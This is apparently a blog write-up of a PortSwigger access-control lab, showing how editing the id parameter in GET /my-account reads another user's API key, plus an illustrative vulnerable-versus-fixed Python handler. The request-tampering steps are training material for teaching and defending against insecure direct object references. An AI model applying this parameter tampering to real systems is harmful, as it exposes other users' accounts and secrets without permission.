apsyleg · 1 min read
#portswigger #access-control #web-security
User ID Controlled by Request Parameter
Lab
User ID controlled by request parameter · Apprentice
Solution
Given
This lab has a horizontal privilege escalation vulnerability on the user account page.
To solve the lab, obtain the API key for the user carlos and submit it as the solution.
You can log in to your own account using the following credentials: wiener:peter
Analyzing the task
This looks like a very simple lab. We need the API key of user carlos, and the account page takes the user id as a request parameter. Because the server trusts that parameter instead of deriving the account from the logged-in session, we only have to change its value.
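To make the flaw concrete, here is the server-side pattern behind this class of bug, written as an added example (this is not the lab's real source code): a handler that trusts the `id` parameter, next to one that binds the account to the authenticated session. The `ACCOUNTS` table, the keys in it and the function names are constructed for the example.

```python
# Added example, not the lab's own code. Shows why "?id=carlos" works and
# what the fix looks like: the account must come from the session, not the URL.

# Constructed sample data; the real lab's keys are random per instance.
ACCOUNTS = {
    "wiener": {"api_key": "constructed-key-for-wiener"},
    "carlos": {"api_key": "constructed-key-for-carlos"},
}


class Forbidden(Exception):
    """Raised when a user asks for an account that is not their own."""


class NotFound(Exception):
    """Raised when the requested account does not exist."""


def my_account_vulnerable(session_user: str, params: dict) -> dict:
    """Vulnerable: the account is selected by the client-supplied ?id=.

    session_user is the user the session cookie belongs to; params are the
    query parameters. Any logged-in user can read any other user's key.
    """
    user_id = params.get("id", session_user)
    if user_id not in ACCOUNTS:
        raise NotFound(user_id)
    return {"username": user_id, "api_key": ACCOUNTS[user_id]["api_key"]}


def my_account_fixed(session_user: str, params: dict) -> dict:
    """Fixed: the account is the session's own. An ?id= that names anyone
    else is refused before any data is looked up (fail closed)."""
    requested = params.get("id", session_user)
    if requested != session_user:
        raise Forbidden(f"{session_user} may not view account {requested}")
    if session_user not in ACCOUNTS:
        raise NotFound(session_user)
    return {
        "username": session_user,
        "api_key": ACCOUNTS[session_user]["api_key"],
    }


if __name__ == "__main__":
    # wiener is logged in and asks for carlos's page, as in the lab.
    print(my_account_vulnerable("wiener", {"id": "carlos"}))
    try:
        my_account_fixed("wiener", {"id": "carlos"})
    except Forbidden as exc:
        print("fixed handler refused:", exc)
```

The comparison the fixed handler makes is the whole fix; dropping the `id` parameter from the URL alone is not enough if the server still honours it when present.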
Recon
Log in as wiener and look at the request that loads the account page:
GET /my-account?id=wiener
The API key is displayed on this page. Change the id parameter to carlos and resend the request:
GET /my-account?id=carlos
<div id=account-content>
<p>Your username is: carlos</p>
<div>Your API Key is: mxH4cyoguaAAuo3kCtqzv1ySjfORtagJ</div>
Submit that key as the solution. Lab solved.